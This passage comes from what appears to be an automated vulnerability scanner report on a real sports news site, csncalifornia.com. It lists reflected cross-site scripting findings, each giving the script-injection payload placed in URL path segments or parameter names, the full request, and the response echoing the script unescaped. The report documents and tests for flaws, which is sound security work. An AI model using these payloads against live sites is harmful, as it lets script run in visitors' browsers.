Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1270697"><script>alert(1)</script>1804d5ee4fd/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html">
...[SNIP]...

2.257. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5216"><script>alert(1)</script>f2573155745 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16b5216"><script>alert(1)</script>f2573155745/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/16b5216"><script>alert(1)</script>f2573155745/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html">
...[SNIP]...

2.258. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57718"><script>alert(1)</script>e68fb5e70dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/1057718"><script>alert(1)</script>e68fb5e70dd/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/16/1057718"><script>alert(1)</script>e68fb5e70dd/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html">
...[SNIP]...

2.259. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281c4"><script>alert(1)</script>34004d1a473 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/img-srchttpcsnbayareacomcommonglobal_ima281c4"><script>alert(1)</script>34004d1a473/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima281c4"><script>alert(1)</script>34004d1a473/landing_maiocco_v3.html">
...[SNIP]...

2.260. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcd4"><script>alert(1)</script>0ee47242d1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12fbcd4"><script>alert(1)</script>0ee47242d1f/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12fbcd4"><script>alert(1)</script>0ee47242d1f/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html">
...[SNIP]...

2.261. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a388d"><script>alert(1)</script>9f4a1806180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17a388d"><script>alert(1)</script>9f4a1806180/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17a388d"><script>alert(1)</script>9f4a1806180/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html">
...[SNIP]...

2.262. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a32d"><script>alert(1)</script>12f9844ae10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/106a32d"><script>alert(1)</script>12f9844ae10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/106a32d"><script>alert(1)</script>12f9844ae10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html">
...[SNIP]...

2.263. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc7a"><script>alert(1)</script>7cd78c0a049 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/As-claim-RHP-Humber-off-waivers-from-Royfcc7a"><script>alert(1)</script>7cd78c0a049/landing_athletics.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55859

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/As-claim-RHP-Humber-off-waivers-from-Royfcc7a"><script>alert(1)</script>7cd78c0a049/landing_athletics.html">
...[SNIP]...

2.264. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf5af"><script>alert(1)</script>5c392a695db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html?bf5af"><script>alert(1)</script>5c392a695db=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55822

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="bf5af"><script>alert(1)</script>5c392a695db" id = "bf5af">
...[SNIP]...

2.265. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca61"><script>alert(1)</script>08389237d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /122ca61"><script>alert(1)</script>08389237d76/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/122ca61"><script>alert(1)</script>08389237d76/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.266. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2f7"><script>alert(1)</script>ba163911b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/172d2f7"><script>alert(1)</script>ba163911b6/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41035

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/172d2f7"><script>alert(1)</script>ba163911b6/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.267. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fe8"><script>alert(1)</script>05e1ea8573e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/1065fe8"><script>alert(1)</script>05e1ea8573e/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41017

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/1065fe8"><script>alert(1)</script>05e1ea8573e/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html">
...[SNIP]...

2.268. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 583e7"><script>alert(1)</script>fcf10942d4d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Maiocco-Singletary-again-weighs-which-Sm583e7"><script>alert(1)</script>fcf10942d4d/landing_maiocco_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Maiocco-Singletary-again-weighs-which-Sm583e7"><script>alert(1)</script>fcf10942d4d/landing_maiocco_v3.html">
...[SNIP]...

2.269. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b049f"><script>alert(1)</script>f73d3656f88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12b049f"><script>alert(1)</script>f73d3656f88/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42259

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12b049f"><script>alert(1)</script>f73d3656f88/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html">
...[SNIP]...

2.270. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57d6"><script>alert(1)</script>506006193ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17f57d6"><script>alert(1)</script>506006193ac/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42259

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17f57d6"><script>alert(1)</script>506006193ac/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html">
...[SNIP]...

2.271. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa447"><script>alert(1)</script>26243a634b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10fa447"><script>alert(1)</script>26243a634b3/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42240

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10fa447"><script>alert(1)</script>26243a634b3/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html">
...[SNIP]...

2.272. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
